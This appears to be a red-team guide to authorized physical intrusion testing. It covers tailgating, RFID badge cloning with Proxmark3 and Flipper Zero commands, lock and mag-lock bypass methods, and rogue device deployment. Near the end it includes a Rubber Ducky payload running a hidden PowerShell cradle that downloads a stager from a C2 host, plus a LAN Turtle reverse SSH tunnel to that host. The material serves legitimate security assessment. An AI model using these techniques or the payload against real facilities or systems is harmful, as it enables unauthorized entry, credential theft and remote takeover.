Conduct authorized physical penetration testing using tailgating, badge cloning, lock bypassing, and rogue device deployment to evaluate facility security controls.
Physical intrusion assessment evaluates an organization's physical security controls by attempting to gain unauthorized access to facilities, server rooms, and restricted areas. This includes tailgating employees, cloning RFID access badges, bypassing locks, deploying rogue network devices, and testing security guard procedures. Physical security testing is a critical component of full-scope red team engagements, as it often provides the most direct path to network access. MITRE ATT&CK maps physical access techniques under T1200 (Hardware Additions) and T1091 (Replication Through Removable Media).
| Technique ID | Name | Tactic |
|---|---|---|
| T1200 | Hardware Additions | Initial Access |
| T1091 | Replication Through Removable Media | Initial Access |
| T1199 | Trusted Relationship | Initial Access |
| T1078 | Valid Accounts | Initial Access |
| Tool | Purpose | Approximate Cost |
|---|---|---|
| Proxmark3 RDV4 | RFID badge cloning (125kHz/13.56MHz) | $300 |
| Flipper Zero | Multi-protocol RF analysis | $170 |
| Lock pick set (Sparrows) | Mechanical lock bypassing | $35 |
| Under-door tool (UDT) | Bypass door from outside | $30 |
| Shove knife / latch slip | Spring bolt bypass | $15 |
| LAN Turtle | Rogue network implant | $60 |
| WiFi Pineapple | Rogue wireless AP | $100 |
| Rubber Ducky / Bash Bunny | USB keystroke injection | $50-80 |
| Clipboard + hard hat + hi-vis | Social engineering props | $20 |
| Body camera | Evidence documentation | $50 |
Tailgating involves following an authorized person through a secured entry point without presenting credentials.
Methods:
Countermeasures to test:
# Proxmark3 - Read a low-frequency (125kHz) HID card
proxmark3> lf hid read
# Output: HID Prox TAG ID: 2006xxxxxx - FC: 123 CN: 45678
# Clone to a T5577 blank card
proxmark3> lf hid clone --fc 123 --cn 45678
# Read high-frequency (13.56MHz) MIFARE card
proxmark3> hf mf rdbl --blk 0 -k FFFFFFFFFFFF
# Long-range capture with custom antenna (up to 3 feet)
proxmark3> lf hid read # with extended antenna
# Flipper Zero - Read and emulate
# RFID > Read > Hold card to Flipper > Save > Emulate
Badge cloning attack flow:
| Lock Type | Bypass Method | Difficulty |
|---|---|---|
| Pin tumbler (standard) | Pick, rake, or bump key | Easy-Medium |
| Wafer lock (filing cabinets) | Pick or jiggle | Easy |
| Tubular lock (vending, server) | Tubular pick tool | Easy |
| Electronic lock (keypad) | Shoulder surf, thermal camera | Medium |
| Magnetic lock (mag lock) | Under-door tool, REX sensor bypass | Medium |
| Smart lock (Bluetooth) | Replay attack, firmware exploit | Hard |
# Electronic keypad - thermal imaging after use
# Warmer keys = more recently pressed
# Use FLIR camera to capture heat signatures within 30 seconds
# REX (Request to Exit) sensor bypass
# Insert thin wire or use a can of compressed air to trigger motion sensor
# on the inside of a mag-locked door
# LAN Turtle - Plug into exposed Ethernet port
# Provides SSH reverse tunnel back to C2 server
# Auto-configures as man-in-the-middle
# Configure LAN Turtle for reverse SSH
# Module: AutoSSH
# Host: c2.redteam.com
# Port: 22
# Remote port: 2222
# WiFi Pineapple - Deploy in common area
# Captures wireless credentials via evil twin attack
# Exfiltrates data over cellular modem
# USB Rubber Ducky - Drop in parking lot or leave on desk
# Payload: Download and execute C2 agent
# Duckyscript:
# DELAY 1000
# GUI r
# DELAY 500
# STRING powershell -w hidden -c "IEX(New-Object Net.WebClient).DownloadString('https://c2.redteam.com/stager.ps1')"
# ENTER
Search external waste containers and recycling bins for: